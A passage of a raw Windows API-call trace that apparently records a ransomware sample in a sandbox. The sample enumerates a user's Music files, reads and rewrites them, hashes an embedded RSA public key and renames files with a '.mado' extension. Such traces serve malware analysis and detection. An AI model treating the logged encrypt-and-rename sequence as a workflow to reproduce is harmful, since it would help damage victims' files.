[0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b68190 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b682a8 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321c00 | out: hHeap=0x2c0000) returned 1 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ec88 | out: hHeap=0x2c0000) returned 1 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68190 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2c8 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0218 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2b0 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b80810 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.497] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ed90 | out: hHeap=0x2c0000) returned 1 [0204.497] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x17850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.497] WriteFile (in: hFile=0x63c, lpBuffer=0x3b6eb80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x3b6eb80*, lpNumberOfBytesWritten=0x39cfb50*=0x100, lpOverlapped=0x0) returned 1 [0204.498] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0204.498] WriteFile (in: hFile=0x63c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39cfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39cfb50*=0x26, lpOverlapped=0x0) returned 1 [0204.498] CloseHandle (hObject=0x63c) returned 1 [0204.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321c00 [0204.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x890) returned 0x3b74b68 [0204.499] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jR1AF6IsbszDHd9hdDak.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jr1af6isbszdhd9hddak.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\jR1AF6IsbszDHd9hdDak.wav.mado" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\jr1af6isbszdhd9hddak.wav.mado")) returned 1 [0204.500] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x225815f0, ftCreationTime.dwHighDateTime=0x1d5df55, ftLastAccessTime.dwLowDateTime=0x33c2e6e0, ftLastAccessTime.dwHighDateTime=0x1d5dc16, ftLastWriteTime.dwLowDateTime=0x33c2e6e0, ftLastWriteTime.dwHighDateTime=0x1d5dc16, nFileSizeHigh=0x0, nFileSizeLow=0x82ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="K1B2Jfw.wav", cAlternateFileName="")) returned 1 [0204.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3a48 [0204.500] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x326020 [0204.500] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K1B2Jfw.wav") returned=".wav" [0204.501] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\K1B2Jfw.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\k1b2jfw.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0204.501] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=33517) returned 1 [0204.501] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0204.503] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x82c7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0204.503] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0204.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0204.505] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x82ed, lpOverlapped=0x0) returned 1 [0204.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.505] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0204.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0204.505] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321b78) returned 1 [0204.506] CryptCreateHash (in: hProv=0x321b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0204.506] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0204.506] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0204.506] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0204.506] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0204.506] GetLastError () returned 0x0 [0204.506] CryptDestroyHash (hHash=0x32ef238) returned 1 [0204.507] CryptReleaseContext (hProv=0x321b78, dwFlags=0x0) returned 1 [0204.507] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0204.507] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0204.507] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0204.507] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b6bb80, Size=0x218) returned 0x3b7c8d0 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0204.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0204.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277198 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fe310 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36c0 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fe2f8 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b68078 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b68190 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36e0 [0204.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c8d0 | out: hHeap=0x2c0000) returned 1 [0204.508] GetCurrentThreadId () returned 0x600 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6eb80 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b71bd0 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ed90 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.508] GetCurrentThreadId () returned 0x600 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0204.508] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0204.508] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6efa0 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c3a48 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ec88 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe340 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe310 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7c0 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2e0 [0204.509] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7e0 | out: hHeap=0x2c0000) returned 1 [0204.509] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe358 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771c8 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7a0 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe328 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe370 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9f0 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277198 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36a0 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f0 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b37c0 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fe2f8 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x3b7c8d0 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe340 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b68078 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe370 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x3b74b68 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b37c0 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x3b682a8 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b780 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x3b683c0 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2f8 | out: hHeap=0x2c0000) returned 1 [0204.510] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x3b74d80 [0204.510] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68078 | out: hHeap=0x2c0000) returned 1 [0204.511] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b6ee98 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321b78 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6efa0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6ee98 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36a0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b683c0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74d80 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b682a8 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b790 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe328 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7b0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe358 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36c0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe310 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fe2e0 | out: hHeap=0x2c0000) returned 1 [0204.511] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x336fe98 | out: 